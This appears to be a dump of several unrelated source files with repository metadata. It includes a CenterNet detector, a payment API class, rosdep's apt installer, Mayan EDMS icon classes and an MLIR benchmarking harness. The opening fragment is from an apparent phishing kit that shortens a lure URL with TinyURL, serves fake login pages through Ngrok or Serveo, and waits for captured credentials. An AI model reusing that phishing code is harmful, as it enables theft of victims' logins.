link = check_output("curl -s 'http://tinyurl.com/api-create.php?url='"+url, shell=True).decode().replace('http', 'https')
print("\n {0}[{1}*{0}]{1} TINYURL: {2}".format(CYAN, DEFAULT, GREEN) + link + "{1}".format(CYAN, DEFAULT, GREEN))
print("\n")
break
def runServer():
system("cd Server/www/ && php -S 127.0.0.1:1111 > /dev/null 2>&1 &")
if __name__ == "__main__":
try:
runPEnv()
def custom(): #Question where user can input custom web-link
print("\n {0}Insert a custom redirect url:".format(CYAN, DEFAULT))
custom = input("\n {0}SF-An0nUD4Y > {1}".format(CYAN, DEFAULT))
if 'http://' or 'https://' in custom:
pass
else:
custom = 'http://' + custom
if path.exists('Server/www/post.php') and path.exists('Server/www/login.php'):
with open('Server/www/login.php') as f:
read_data = f.read()
c = read_data.replace('<CUSTOM>', custom)
f = open('Server/www/login.php', 'w')
f.write(c)
f.close()
with open('Server/www/post.php') as f:
read_data = f.read()
c = read_data.replace('<CUSTOM>', custom)
f = open('Server/www/post.php', 'w')
f.write(c)
f.close()
else:
with open('Server/www/login.php') as f:
read_data = f.read()
c = read_data.replace('<CUSTOM>', custom)
f = open('Server/www/login.php', 'w')
f.write(c)
f.close()
custom()
def server(): #Question where user must select server
print("\n {0}Please select any available server:{1}".format(CYAN, DEFAULT))
print("\n {0}[{1}1{0}]{1} Ngrok\n {0}[{1}2{0}]{1} Serveo".format(CYAN, DEFAULT))
choice = input(" \n {0}SF-An0nUD4Y > {1}".format(CYAN, DEFAULT))
if choice == '1':
runNgrok()
elif choice == '2':
runServeo()
else:
system('clear')
return server()
server()
multiprocessing.Process(target=runServer).start()
waitCreds()
except KeyboardInterrupt:
end()
exit(0)
| 48.318653 | 607 | 0.520884 |
23f3a61f0a328519760a1d240086978a11ac3bf2 | 3,721 | py | Python | src/lib/detectors/ctdet_NFS.py | StudentWong/CenterNet | d20640d40db522b14813e21febff187bd4d75738 | [
"MIT"
] | null | null | null | src/lib/detectors/ctdet_NFS.py | StudentWong/CenterNet | d20640d40db522b14813e21febff187bd4d75738 | [
"MIT"
] | null | null | null | src/lib/detectors/ctdet_NFS.py | StudentWong/CenterNet | d20640d40db522b14813e21febff187bd4d75738 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
import numpy as np
from progress.bar import Bar
import time
import torch
try:
from external.nms import soft_nms
except:
print('NMS not imported! If you need it,'
' do \n cd $CenterNet_ROOT/src/lib/external \n make')
from models.decode import ctdet_decode
from models.utils import flip_tensor
from utils.image import get_affine_transform
from utils.post_process import ctdet_post_process
from utils.debugger import Debugger
from .base_detector import BaseDetector
class CtdetDetector_NFS(BaseDetector):
def __init__(self, opt, train_eval=False, model=None):
super(CtdetDetector_NFS, self).__init__(opt, train_eval, model)
def process(self, images, return_time=False):
with torch.no_grad():
output = self.model(images)[-1]
hm = output['hm']
wh = output['wh']
reg = output['reg'] if self.opt.reg_offset else None
if self.opt.flip_test:
hm = (hm[0:1] + flip_tensor(hm[1:2])) / 2
wh = (wh[0:1] + flip_tensor(wh[1:2])) / 2
reg = reg[0:1] if reg is not None else None
torch.cuda.synchronize()
forward_time = time.time()
dets = ctdet_decode(hm, wh, reg=reg, cat_spec_wh=self.opt.cat_spec_wh, K=self.opt.K)
if return_time:
return output, dets, forward_time
else:
return output, dets
def post_process(self, dets, meta, scale=1):
dets = dets.detach().cpu().numpy()
dets = dets.reshape(1, -1, dets.shape[2])
dets = ctdet_post_process(
dets.copy(), [meta['c']], [meta['s']],
meta['out_height'], meta['out_width'], self.opt.num_classes)
for j in range(1, self.num_classes + 1):
dets[0][j] = np.array(dets[0][j], dtype=np.float32).reshape(-1, 5)
dets[0][j][:, :4] /= scale
return dets[0]
def merge_outputs(self, detections):
results = {}
for j in range(1, self.num_classes + 1):
results[j] = np.concatenate(
[detection[j] for detection in detections], axis=0).astype(np.float32)
if len(self.scales) > 1 or self.opt.nms:
soft_nms(results[j], Nt=0.5, method=2)
scores = np.hstack(
[results[j][:, 4] for j in range(1, self.num_classes + 1)])
if len(scores) > self.max_per_image:
kth = len(scores) - self.max_per_image
thresh = np.partition(scores, kth)[kth]
for j in range(1, self.num_classes + 1):
keep_inds = (results[j][:, 4] >= thresh)
results[j] = results[j][keep_inds]
return results
def debug(self, debugger, images, dets, output, scale=1):
detection = dets.detach().cpu().numpy().copy()
detection[:, :, :4] *= self.opt.down_ratio
for i in range(1):
img = images[i].detach().cpu().numpy().transpose(1, 2, 0)
img = ((img * self.std + self.mean) * 255).astype(np.uint8)
pred = debugger.gen_colormap(output['hm'][i].detach().cpu().numpy())
debugger.add_blend_img(img, pred, 'pred_hm_{:.1f}'.format(scale))
debugger.add_img(img, img_id='out_pred_{:.1f}'.format(scale))
for k in range(len(dets[i])):
if detection[i, k, 4] > self.opt.center_thresh:
debugger.add_coco_bbox(detection[i, k, :4], detection[i, k, -1],
detection[i, k, 4],
img_id='out_pred_{:.1f}'.format(scale))
def show_results(self, debugger, image, results):
debugger.add_img(image, img_id='ctdet')
for j in range(1, self.num_classes + 1):
for bbox in results[j]:
if bbox[4] > self.opt.vis_thresh:
debugger.add_coco_bbox(bbox[:4], j - 1, bbox[4], img_id='ctdet')
debugger.show_all_imgs(pause=self.pause)
| 37.969388 | 90 | 0.637463 |
c6b03130a2b33ca4ebb6173a4523fbca0a107826 | 386 | py | Python | cieloApi3/request/reactivateRecorrency.py | naripok/API-3.0-Python | 3bdd27d321a03f4c761876f7907588a0f4726c70 | [
"MIT"
] | 37 | 2017-01-19T12:25:14.000Z | 2022-02-22T12:43:39.000Z | cieloApi3/request/reactivateRecorrency.py | math-s/API-3.0-Python | 8b493963f6dcc23cbe54221434f2fcfde3bccfdc | [
"MIT"
] | 5 | 2020-05-18T22:50:12.000Z | 2022-02-26T23:48:48.000Z | cieloApi3/request/reactivateRecorrency.py | math-s/API-3.0-Python | 8b493963f6dcc23cbe54221434f2fcfde3bccfdc | [
"MIT"
] | 46 | 2017-02-07T16:35:54.000Z | 2022-02-03T19:06:06.000Z |
from .base import Base
class ReactivateRecorrency(Base):
def __init__(self, merchant, environment):
super(ReactivateRecorrency, self).__init__(merchant)
self.environment = environment
def execute(self, payment_id):
uri = '%s1/RecurrentPayment/%s/Reactivate' % (self.environment.api_query, payment_id)
return self.send_request("PUT", uri)
| 22.705882 | 93 | 0.699482 |
79c0fb2b59f3f25d690dabc6bf0de4c036efad72 | 1,506 | py | Python | generate-markdown.py | rakina/security-questionnaire | 9a18d70885ef028144708a1367ef763ab85f287e | [
"W3C-20150513",
"CC0-1.0"
] | 26 | 2015-05-21T15:24:43.000Z | 2022-03-09T21:27:10.000Z | generate-markdown.py | MaxMood96/security-questionnaire | c54ad08c20a102869c384b46a367ff7a9026556c | [
"W3C-20150513",
"CC0-1.0"
] | 99 | 2015-05-06T16:41:09.000Z | 2022-03-23T21:39:26.000Z | generate-markdown.py | MaxMood96/security-questionnaire | c54ad08c20a102869c384b46a367ff7a9026556c | [
"W3C-20150513",
"CC0-1.0"
] | 26 | 2015-06-12T18:07:54.000Z | 2021-10-14T21:58:45.000Z | #!/usr/bin/env python3
import sys
class MarkdownGenerator:
def __init__(self):
self.in_question = False
self.first_line_in_question = False
self.prefix = ""
self.qnum = 0
def process_line(self, line, outfile):
if self.in_question:
if not line.startswith("</h3>"):
line = line.lstrip()
if self.first_line_in_question:
self.qnum += 1
self.prefix = "> %02d. " % self.qnum
self.first_line_in_question = False
print(self.prefix, line, end='', file=outfile)
self.prefix = "> "
else:
self.in_question = False
elif line.startswith("<h3 class=question id="):
self.in_question = True
self.first_line_in_question = True
def generate_markdown(self, infile=sys.stdin, outfile=sys.stdout):
print("""# [Self-Review Questionnaire: Security and Privacy](https://w3ctag.github.io/security-questionnaire/)
This questionnaire has [moved](https://w3ctag.github.io/security-questionnaire/).
For your convenience, a copy of the questionnaire's questions is quoted here in Markdown, so you can easily include your answers in an [explainer](https://github.com/w3ctag/w3ctag.github.io/blob/master/explainers.md).
""", file=outfile)
[self.process_line(line, outfile) for line in infile]
if __name__ == '__main__':
MarkdownGenerator().generate_markdown()
| 38.615385 | 217 | 0.622842 |
2e24e96acf89797685335185d8ea61db1cc2798c | 4,590 | py | Python | src/rosdep2/platforms/debian.py | NikolausDemmel/rosdep | 5897af419cbabc078659ef8a696f3538a868cb6e | [
"BSD-3-Clause"
] | null | null | null | src/rosdep2/platforms/debian.py | NikolausDemmel/rosdep | 5897af419cbabc078659ef8a696f3538a868cb6e | [
"BSD-3-Clause"
] | null | null | null | src/rosdep2/platforms/debian.py | NikolausDemmel/rosdep | 5897af419cbabc078659ef8a696f3538a868cb6e | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) 2009, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# Author Tully Foote, Ken Conley
from rospkg.os_detect import OS_DEBIAN, OS_UBUNTU
from .pip import PIP_INSTALLER
from .gem import GEM_INSTALLER
from .source import SOURCE_INSTALLER
from ..installers import PackageManagerInstaller, TYPE_CODENAME
from ..shell_utils import read_stdout
# apt package manager key
APT_INSTALLER='apt'
def register_installers(context):
context.set_installer(APT_INSTALLER, AptInstaller())
def register_platforms(context):
register_debian(context)
register_ubuntu(context)
def register_debian(context):
context.add_os_installer_key(OS_DEBIAN, APT_INSTALLER)
context.add_os_installer_key(OS_DEBIAN, PIP_INSTALLER)
context.add_os_installer_key(OS_DEBIAN, GEM_INSTALLER)
context.add_os_installer_key(OS_DEBIAN, SOURCE_INSTALLER)
context.set_default_os_installer_key(OS_DEBIAN, APT_INSTALLER)
context.set_os_version_type(OS_DEBIAN, TYPE_CODENAME)
def register_ubuntu(context):
context.add_os_installer_key(OS_UBUNTU, APT_INSTALLER)
context.add_os_installer_key(OS_UBUNTU, PIP_INSTALLER)
context.add_os_installer_key(OS_UBUNTU, GEM_INSTALLER)
context.add_os_installer_key(OS_UBUNTU, SOURCE_INSTALLER)
context.set_default_os_installer_key(OS_UBUNTU, APT_INSTALLER)
context.set_os_version_type(OS_UBUNTU, TYPE_CODENAME)
def dpkg_detect(pkgs, exec_fn=None):
"""
Given a list of package, return the list of installed packages.
:param exec_fn: function to execute Popen and read stdout (for testing)
"""
ret_list = []
# this is mainly a hack to support version locking for eigen.
# we strip version-locking syntax, e.g. libeigen3-dev=3.0.1-*.
# our query does not do the validation on the version itself.
version_lock_map = {}
for p in pkgs:
if '=' in p:
version_lock_map[p.split('=')[0]] = p
else:
version_lock_map[p] = p
cmd = ['dpkg-query', '-W', '-f=\'${Package} ${Status}\n\'']
cmd.extend(version_lock_map.keys())
if exec_fn is None:
exec_fn = read_stdout
std_out = exec_fn(cmd)
std_out = std_out.replace('\'','')
pkg_list = std_out.split('\n')
for pkg in pkg_list:
pkg_row = pkg.split()
if len(pkg_row) == 4 and (pkg_row[3] =='installed'):
ret_list.append( pkg_row[0])
return [version_lock_map[r] for r in ret_list]
class AptInstaller(PackageManagerInstaller):
"""
An implementation of the Installer for use on debian style
systems.
"""
def __init__(self):
super(AptInstaller, self).__init__(dpkg_detect)
def get_install_command(self, resolved, interactive=True, reinstall=False):
packages = self.get_packages_to_install(resolved, reinstall=reinstall)
if not packages:
return []
if not interactive:
return [['sudo', 'apt-get', 'install', '-y', p] for p in packages]
else:
return [['sudo', 'apt-get', 'install', p] for p in packages]
| 41.351351 | 79 | 0.725926 |
9b05a39fc34056208b77b81b09573c56b52738b7 | 3,184 | py | Python | mayan/apps/appearance/classes.py | Syunkolee9891/Mayan-EDMS | 3759a9503a264a180b74cc8518388f15ca66ac1a | [
"Apache-2.0"
] | 1 | 2021-06-17T18:24:25.000Z | 2021-06-17T18:24:25.000Z | mayan/apps/appearance/classes.py | Syunkolee9891/Mayan-EDMS | 3759a9503a264a180b74cc8518388f15ca66ac1a | [
"Apache-2.0"
] | 7 | 2020-06-06T00:01:04.000Z | 2022-01-13T01:47:17.000Z | mayan/apps/appearance/classes.py | Syunkolee9891/Mayan-EDMS | 3759a9503a264a180b74cc8518388f15ca66ac1a | [
"Apache-2.0"
] | null | null | null | from __future__ import unicode_literals
from django.template.loader import get_template
class IconDriver(object):
_registry = {}
@classmethod
def get(cls, name):
return cls._registry[name]
@classmethod
def register(cls, driver_class):
cls._registry[driver_class.name] = driver_class
class FontAwesomeDriver(IconDriver):
name = 'fontawesome'
template_name = 'appearance/icons/font_awesome_symbol.html'
def __init__(self, symbol):
self.symbol = symbol
def render(self):
return get_template(template_name=self.template_name).render(
context={'symbol': self.symbol}
)
class FontAwesomeDualDriver(IconDriver):
name = 'fontawesome-dual'
template_name = 'appearance/icons/font_awesome_layers.html'
def __init__(self, primary_symbol, secondary_symbol):
self.primary_symbol = primary_symbol
self.secondary_symbol = secondary_symbol
def render(self):
return get_template(template_name=self.template_name).render(
context={
'data': (
{
'class': 'fas fa-circle',
'transform': 'down-3 right-10',
'mask': 'fas fa-{}'.format(self.primary_symbol)
},
{'class': 'far fa-circle', 'transform': 'down-3 right-10'},
{
'class': 'fas fa-{}'.format(self.secondary_symbol),
'transform': 'shrink-4 down-3 right-10'
},
)
}
)
class FontAwesomeCSSDriver(IconDriver):
name = 'fontawesomecss'
template_name = 'appearance/icons/font_awesome_css.html'
def __init__(self, css_classes):
self.css_classes = css_classes
def render(self):
return get_template(template_name=self.template_name).render(
context={'css_classes': self.css_classes}
)
class FontAwesomeMasksDriver(IconDriver):
name = 'fontawesome-masks'
template_name = 'appearance/icons/font_awesome_masks.html'
def __init__(self, data):
self.data = data
def render(self):
return get_template(template_name=self.template_name).render(
context={'data': self.data}
)
class FontAwesomeLayersDriver(IconDriver):
name = 'fontawesome-layers'
template_name = 'appearance/icons/font_awesome_layers.html'
def __init__(self, data):
self.data = data
def render(self):
return get_template(template_name=self.template_name).render(
context={'data': self.data}
)
class Icon(object):
def __init__(self, driver_name, **kwargs):
self.kwargs = kwargs
self.driver = IconDriver.get(name=driver_name)(**kwargs)
def render(self, **kwargs):
return self.driver.render(**kwargs)
IconDriver.register(driver_class=FontAwesomeCSSDriver)
IconDriver.register(driver_class=FontAwesomeDriver)
IconDriver.register(driver_class=FontAwesomeDualDriver)
IconDriver.register(driver_class=FontAwesomeLayersDriver)
IconDriver.register(driver_class=FontAwesomeMasksDriver)
| 28.684685 | 79 | 0.639133 |
7a682bcde0c7840d533e59365e7382cf6c41bfcb | 28,144 | py | Python | python/examples/core/harness.py | 00mjk/iree-llvm-sandbox | f076d9668d38ff8374c97650992a8027afa3f38e | [
"Apache-2.0"
] | 1 | 2022-03-11T20:12:50.000Z | 2022-03-11T20:12:50.000Z | python/examples/core/harness.py | 00mjk/iree-llvm-sandbox | f076d9668d38ff8374c97650992a8027afa3f38e | [
"Apache-2.0"
] | null | null | null | python/examples/core/harness.py | 00mjk/iree-llvm-sandbox | f076d9668d38ff8374c97650992a8027afa3f38e | [
"Apache-2.0"
] | 1 | 2022-03-11T20:12:51.000Z | 2022-03-11T20:12:51.000Z | # Make dict a generic (type-subscriptable) type for Python <3.9.
from __future__ import annotations
import argparse
import re
import sys
import os
import time
from collections import defaultdict
from typing import AbstractSet, Any, Callable, List, Mapping, Optional, Sequence, Union
import numpy
import pandas
from mlir.execution_engine import *
from mlir.ir import *
from mlir.runtime import *
from mlir.iree_sandbox import register_sandbox_passes_and_dialects
from mlir.dialects.builtin import ModuleOp
import mlir.dialects.linalg_transform as tx
from ..core.compilation import compile_to_execution_engine, \
emit_benchmarking_function, mlir_type
from ..core.experts import TransformationList
from ..core.problem_definition import *
from ..core.transforms import ApplySchedule
from ..core.utils import *
# Log everything to stderr and flush so that we have a unified stream to match
# errors/info emitted by MLIR to stderr.
def log(*args):
print(*args, file=sys.stderr)
sys.stderr.flush()
# AVX512 throttling needs a lot of iteration, chance to only report the last n
# after throttling has had a good chance of happening.
def keep_last_n_if_specified(timing_results: List):
if 'SANDBOX_KEEP_LAST_N_RUNS' in os.environ:
n_to_keep = int(os.getenv('SANDBOX_KEEP_LAST_N_RUNS'))
n_to_keep = min(n_to_keep, len(timing_results))
return timing_results[-n_to_keep:]
return timing_results
TimingResults = Mapping[str, Sequence[float]]
ProblemSizes = Sequence[Union[int, Sequence[int]]]
class Measurements:
"""Class storing measurement configuration and results in data frame."""
config_keys = [ \
"function_name",
"expert",
"np_types",
"dynamic_at_compile_time",
"runtime_problem_sizes_dict",
"total_gflops",
"total_gbytes",
]
data_keys = [ \
"elapsed_s_per_iter",
"gbyte_per_s_per_iter",
"gflop_per_s_per_iter",
]
def __init__(self):
self.data = pandas.DataFrame(
dict([(col, []) for col in self.config_keys + self.data_keys]))
def append(self, function_name: str, expert_name: str,
np_types: Sequence[np.dtype],
dynamic_at_compile_time_sizes: AbstractSet[str],
runtime_problem_sizes_dict: Mapping[str, ProblemSizes],
gflops: int, gbytes: int, timing_results_dict: TimingResults):
"""Append measurement results."""
config = pandas.DataFrame(
dict(
zip(self.config_keys,
[[function_name], [expert_name],
[self._stringify_types(np_types)],
[self._stringify_set(dynamic_at_compile_time_sizes)],
[self._stringify_dict(runtime_problem_sizes_dict)], [gflops],
[gbytes]])))
results = pandas.DataFrame(
dict([(k, timing_results_dict[k]) for k in self.data_keys]))
# Cross-product: add an identical fake key to both data frames,
# merge on that key, and delete it.
config['_fake_key'] = 1
results['_fake_key'] = 1
product = config.merge(results, on='_fake_key') \
.drop(labels='_fake_key', axis=1)
self.data = self.data.append(product)
def to_dict(self) -> dict[str, Any]:
"""Return a dictionary containing the aggregated data."""
return self.data.to_dict()
def to_data_frame(self) -> pandas.DataFrame:
"""Return a data frame containing the aggregated data."""
return self.data
def dump_to_file(self, file_name: str):
"""Dump the measurements to a json file."""
# Load existing data.
if os.path.exists(file_name):
existing_data = pandas.read_json(file_name)
self.data = existing_data.append(self.data)
# Create the path if needed.
directory = os.path.dirname(file_name)
if not os.path.exists(directory):
os.makedirs(directory)
self.data.reset_index(drop=True, inplace=True)
self.data.to_json(file_name)
def dump_raw_to_file(self, file_name: str):
"""Dump the measurements to a raw file by appending."""
all_data = None
value_column_names = [
'runtime_problem_sizes_dict',
'total_gbytes',
'total_gflops',
'elapsed_s_per_iter',
'gbyte_per_s_per_iter',
'gflop_per_s_per_iter',
]
# Filter the slowest to isolate the compulsory miss effects.
# Drop the first index matching every key_value (i.e. the first measurement)
self.data = self.data.iloc[1:, :]
if os.path.exists(file_name):
all_data = pandas.read_json(file_name)
all_data = pandas.concat(
[all_data, self.data[['function_name', *value_column_names]]])
else:
all_data = self.data[['function_name', *value_column_names]]
all_data.to_json(file_name, orient='records')
def _stringify_types(self, value: Sequence[np.dtype]) -> str:
return ",".join(
[repr(dt).lstrip("<class 'numpy.").rstrip("'>") for dt in value])
def _stringify_set(self, value: AbstractSet[str]) -> str:
return ",".join([k for k in value]) if value else "[]"
def _stringify_dict(self, value: Mapping[str, ProblemSizes]) -> str:
return ",".join([str.format(f"{k}={v}") for k, v in value.items()])
def timed_invoke(run_for_n_iters: Callable, gflop_count: float,
gbyte_count: float, n_iters: int) -> TimingResults:
elapsed_ns = run_for_n_iters(n_iters)
elapsed_s_per_iter = [sec for sec in np.flip(np.sort(elapsed_ns / 1.e9))]
# AVX512 throttling needs a lot of iteration, chance to only report the last n
# after throttling has had a good chance of happening.
elapsed_s_per_iter = keep_last_n_if_specified(elapsed_s_per_iter)
n_iters = len(elapsed_s_per_iter)
gbyte_per_s_per_iter = [(gbyte_count / sec) for sec in elapsed_s_per_iter]
gflop_per_s_per_iter = [(gflop_count / sec) for sec in elapsed_s_per_iter]
print(f'xxxxxxxxxx : {n_iters} iters time on {1} threads')
line = '-' * 120
header_data = \
['slowest', 'p1', 'p10', 'p25', 'p50', 'p75', 'p90', 'p99', 'fastest']
data = [
header_data + ['unit'],
compute_quantiles(elapsed_s_per_iter) + ['seconds'],
compute_quantiles(gflop_per_s_per_iter) + ['GFlops/s'],
compute_quantiles(gbyte_per_s_per_iter) + ['GBs/s']
]
print(line)
format_str = '{:>12s}' * len(data[0])
print(format_str.format(*data[0]))
print(line)
format_str = '{:>12.1e}' * (len(data[0]) - 1) + '{:>12s}'
print(format_str.format(*data[1]))
for i in range(2, len(data)):
format_str = '{:>12.2f}' * (len(data[0]) - 1) + '{:>12s}'
print(format_str.format(*data[i]))
return {
"elapsed_s_per_iter": elapsed_s_per_iter,
"gbyte_per_s_per_iter": gbyte_per_s_per_iter,
"gflop_per_s_per_iter": gflop_per_s_per_iter,
}
# TODO: support more than just RankedTensorType.
def get_mlir_abi_compatible_type(value):
return get_ranked_memref_descriptor(value)
# TODO: tighter type than Sequence[Any].
def get_mlir_abi_compatible_types(input_and_outputs: Sequence[Any]):
# Arguments must be passed as pointers.
return [
ctypes.pointer(ctypes.pointer(get_mlir_abi_compatible_type(t)))
for t in input_and_outputs
]
# Return the list of mlir types matching np_types 1-to-1.
def compiled_function_element_types_mlir_builder(
np_types: Sequence[np.dtype]) -> List[Type]:
return [np_type_to_mlir_type(t) for t in np_types]
def emit_schedule_dialect(module: ModuleOp, transformations: TransformationList):
with InsertionPoint(module.body):
sequence = tx.SequenceOp()
with InsertionPoint(sequence.body.blocks[0]):
for t in transformations.transforms:
t.build_transform_ir()
class ProblemInstance:
problem_definition: ProblemDefinition
# Helpers for both compile-time and runtime.
np_types: Sequence[np.dtype]
# Information about the problem to enable compilation.
compile_time_problem_sizes_dict: dict
# Result of compilation.
mlir_context: Any # TODO: better type
mlir_module: Any # TODO: better type
mlir_execution_engine: Any # TODO: better type
def __init__(self, problem_definition: ProblemDefinition,
np_types: Sequence[np.dtype]):
self.problem_definition = problem_definition
# Helpers for both compile-time and runtime.
self.np_types = np_types
# Information about the problem to enable compilation.
self.compile_time_problem_sizes_dict = None
# Result of compilation.
self.mlir_context = None
self.mlir_module = None
self.mlir_execution_engine = None
def __assert_matching_mapping_keys(self, mapping: Mapping[str, Any]):
if not hasattr(self.problem_definition, 'keys'):
return
assert_dict_entries_match_keys(mapping, self.problem_definition.keys)
def build_problem_under_context_manager(self,
entry_point_name: str,
fun_to_benchmark_name: str,
module,
zero_at_each_iteration: bool = False):
ctx = module.context
register_sandbox_passes_and_dialects(ctx)
with InsertionPoint(module.body):
types = self.problem_definition.types_mlir_builder(
self.compile_time_problem_sizes_dict,
compiled_function_element_types_mlir_builder(self.np_types))
func = self.problem_definition.build_problem_under_context_manager(
fun_to_benchmark_name, types, zero_at_each_iteration)
wrapper = emit_benchmarking_function(entry_point_name, func)
# Must be called under ContextManager with Context() and Location()
def _compile_to_execution_engine(
self,
module,
# TODO: Better type than Callable.
transform: Callable[[ModuleOp], None],
dump_ir_to_file: str = ''):
transformed_module, self.mlir_execution_engine = compile_to_execution_engine(
module, transform)
if (len(dump_ir_to_file) > 0):
f = open(dump_ir_to_file, 'w')
f.write(str(transformed_module))
f.close()
return transformed_module, self.mlir_execution_engine
def compile_with_schedule_builder(
self,
entry_point_name: str,
fun_to_benchmark_name: str,
compile_time_problem_sizes_dict: dict,
# TODO: Better type than Callable.
schedule_builder: Callable,
dump_ir_to_file: str = '',
zero_at_each_iteration: bool = False):
with ir.Context() as ctx, ir.Location.unknown() as loc:
self.mlir_module = Module.create()
self.compile_time_problem_sizes_dict = compile_time_problem_sizes_dict
self.build_problem_under_context_manager(entry_point_name,
fun_to_benchmark_name,
self.mlir_module)
# TODO: this is necessary to force-load the dialect, otherwise op creation
# complains about "unregistered dialect" despite the registration call just
# above.
ctx.dialects["linalg_transform"]
schedule_builder(self.mlir_module)
return self._compile_to_execution_engine(self.mlir_module,
ApplySchedule(),
dump_ir_to_file=dump_ir_to_file)
def compile(
self,
entry_point_name: str,
fun_to_benchmark_name: str,
compile_time_problem_sizes_dict: dict,
# TODO: Better type than Callable.
transform: Callable,
dump_ir_to_file: str = '',
zero_at_each_iteration: bool = False):
assert self.compile_time_problem_sizes_dict is None, \
f'Problem already compiled, please instantiate a new problem'
self.__assert_matching_mapping_keys(compile_time_problem_sizes_dict)
self.compile_time_problem_sizes_dict = compile_time_problem_sizes_dict
with Context() as ctx, Location.unknown() as loc:
self.mlir_context = ctx
self.mlir_module = Module.create()
self.build_problem_under_context_manager(entry_point_name,
fun_to_benchmark_name,
self.mlir_module,
zero_at_each_iteration)
def apply_transform_to_entry_point_name(module):
return transform(entry_point_name, module)
self._compile_to_execution_engine(self.mlir_module,
apply_transform_to_entry_point_name,
dump_ir_to_file)
def run(self,
n_iters: int,
entry_point_name: str,
runtime_problem_sizes_dict: dict,
dump_obj_to_file: str = None,
skip_setup_and_dump_and_check: bool = False):
self.__assert_matching_mapping_keys(runtime_problem_sizes_dict)
assert_runtime_sizes_compatible_with_compile_time_sizes(
runtime_problem_sizes_dict, self.compile_time_problem_sizes_dict)
# 1. Setup NP inputs and outputs
np_input_and_outputs = self.problem_definition.tensors_np_builder(
runtime_problem_sizes_dict, self.np_types)
# np_input_and_outputs needs to remain live as long as
# np_input_and_outputs_pointers is used
np_input_and_outputs_pointers = get_mlir_abi_compatible_types(
np_input_and_outputs)
# 2. Setup function to run, taking a np array of int64.
def run_for_n_iters(n_iters: int):
np_timers = np.zeros([n_iters], dtype=np.int64)
np_timers_pointer = get_mlir_abi_compatible_types([np_timers]).pop()
self.mlir_execution_engine.invoke(entry_point_name,
*np_input_and_outputs_pointers,
np_timers_pointer)
return np_timers
if not skip_setup_and_dump_and_check:
# 3. Pre-run to ensure JIT compilation actually happened to the end.
run_for_n_iters(1)
# 4. Now dump to obj file as the JIT compilation actually happened.
if (dump_obj_to_file is not None and len(dump_obj_to_file) > 0):
self.mlir_execution_engine.dump_to_object_file(dump_obj_to_file)
# 5. Check.
# TODO: this checks seems to be always true as `check_np` is a function
# defined to be just `pass` at the base class level, nobody overrides it as
# attribute to be None.
if self.problem_definition.check_np is not None:
self.problem_definition.check_np(*np_input_and_outputs)
# 5. Showtime.
return timed_invoke(run_for_n_iters=run_for_n_iters,
gflop_count=self.problem_definition.gflop_count_builder(
runtime_problem_sizes_dict),
gbyte_count=self.problem_definition.gbyte_count_builder(
runtime_problem_sizes_dict, self.np_types),
n_iters=n_iters)
def _pytimed(callback: Callable[..., None], *args: Any, **kwargs: Any):
"""Call the given callback and return time in nanoseconds as result."""
start_time = time.monotonic_ns()
results = callback(*args, **kwargs)
end_time = time.monotonic_ns()
duration = (end_time - start_time)
return duration
def _run_benchmark_n_iters(callback: Callable[[int], None], n_iters: int,
*args: Any):
"""Call the given callback `n_iters` times and return the times as a 1-d array."""
return np.asarray([_pytimed(callback, *args) for _ in range(n_iters)])
def _parse_problem_sizes(argument: str) -> Sequence[Union[int, Sequence[int]]]:
"""Parse a problem size argument into a possibly nested integer sequence.
Examples:
64,128 -> [64, 128]
32,32,[1,1] -> [32, 32, [1, 1]]
"""
problem_sizes = []
while argument:
# Match size.
match = re.match(r"""[,]?\d+""", argument)
if match:
problem_sizes.append(int(match.group().lstrip(',')))
argument = argument[match.end():]
continue
# Match nested sizes.
match = re.match(r"""[,]?\[[0-9,]+\]""", argument)
if match:
nested = match.group().lstrip(',')[1:-1]
problem_sizes.append([int(elem) for elem in nested.split(',')])
argument = argument[match.end():]
continue
raise ValueError()
return problem_sizes
def _parse_dimension_list(argument: str) -> Sequence[str]:
"""Parse a sequence of dimensions or the empty list.
Examples:
k,m -> ['k', 'm']
[] -> []
"""
if argument == '[]':
return []
return argument.split(',')
def add_argparser_arguments(
parser: argparse.ArgumentParser, \
default_problem_sizes_list: Sequence[Sequence[int]],
benchmark_name: str = 'Benchmark',
default_n_iters: int = 100,
default_expert_list: Sequence[str] = '',
default_dynamic_at_compile_time_list: Sequence[
Sequence[str]] = [],
default_spec_list: Sequence[str] = []) -> argparse.Namespace:
"""Test argument parser.
Creates an argument parser and returns the parsed arguments.
Arguments:
benchmark_name: Benchmark name.
default_n_iters: Default number of iterations.
default_problem_sizes_list: Default problem sizes.
default_expert_list: Default experts.
default_dynamic_at_compile_time_list: Default dynamic at compile time dimensions.
default_spec_list: Default specification list.
"""
parser.add_argument('--n_iters',
'-i',
type=int,
nargs='?',
help='number of iterations (e.g., -i 100)',
default=default_n_iters)
parser.add_argument('--problem_sizes_list',
'-p',
type=_parse_problem_sizes,
nargs='+',
help='problem sizes (e.g., -p 32,32,64 8,8,8)',
default=default_problem_sizes_list)
parser.add_argument('--expert_list',
